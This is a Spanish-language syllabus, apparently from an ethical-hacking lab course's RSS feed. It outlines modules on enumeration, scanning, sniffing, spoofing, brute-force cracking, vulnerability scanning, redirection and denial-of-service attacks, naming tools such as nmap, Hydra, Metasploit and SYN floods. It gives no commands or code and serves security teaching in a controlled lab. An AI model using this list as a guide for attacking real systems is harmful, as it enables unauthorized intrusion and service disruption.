<p style="text-align: justify;">Instalación y configuración del ambiente virtual controlado de los laboratorios. (Instalación de VMware WorkStation &#8211; Instalación de la distribución BackTrack &#8211; Instalación de Windows 2003 Server Enterprise Edition &#8211; Instalación de las VMware Tools)</p>
<ul>
<li><strong>Identificación de Banner’s (banderas)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la identificación de banner’s (utilización de las herramientas y procedimientos: telnet, netcat, Scanline, Xprobe2, AMAP y banner.c, para la identificación de banner’s.)</p>
<ul>
<li><strong>Enumeración del objetivo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del target enumeration (utilización de las herramientas y procedimientos: nullsesion, getmac, user2sid, sid2user, userdump, userinfo, dumpsec, comandos net, ping’s, pathping’s, nmap, nmapfe, nslookup, nmblookup, rpcinfo, visual route, sam spade, netcraft, sprint y winfingerprint, para la enumeración del objetivo).</p>
<ul>
<li><strong>Escaneo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del scanning (utilización de las herramientas y procedimientos: Angry IP, LANguard, Fscan, Passifist, Lanspy, Netcat, Superscan, Strobe, FTPScanner, TCS CGI Scanner, Hydra, WGateScan/ADM Gates, para las diferentes técnicas de escaneo) .</p>
<ul>
<li><strong>Sniffing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del sniffing (utilización de las herramientas y procedimientos: Ethereal-Wireshark, Ngrep, TcpDump, WinDump, IPDump2, ZxSniffer y Sniffit, para las diferentes ténicas del sniffing)</p>
<ul>
<li><strong>Spoofing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del spoofing (utilización de las herramientas y procedimientos: RafaleX, SMAC y Packit, para las diferentes técnicas del spoofing).</p>
<ul>
<li><strong>Ataques de fuerza bruta</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del brute force (utilización de las herramientas y procedimientos: NETWOX/NETWAG, FGDump, LC, Cain, CHNTPW, John the ripper, BruteFTP y TSGrinder II, para las diferentes técnias de brute force).</p>
<ul>
<li><strong>Escaneo de vulnerabilidades</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del Vulnerability Scanning (utilización de las herramientas y procedimientos: SAINT, NETWOX/NETWAG, Solar Winds, Retina, X-scan, SARA, N-Stealth, Pluto, Metasploit, Nikto, SSS, Cerberus, AutoScan, Nessus y Core Impact, para las diferentes técnicas del vulnerability scanning).</p>
<ul>
<li><strong>Redireccionamiento</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la redirección (utilización de las herramientas y procedimientos: PortMapper, EliteWrap, Fpipe, PsExec y NETWOX/NETWAG, para las diferentes técnicas de la redirección) .</p>
<ul>
<li><strong>Denegación del Servicio (DoS)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la Denegación del Servicio (utilización de las herramientas y procedimientos: Land Attack, Smurf Attack, SYN Attack, UDP Flood y Trash 2.c, para las diferentes técnicas de Denegación del Servicio).</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

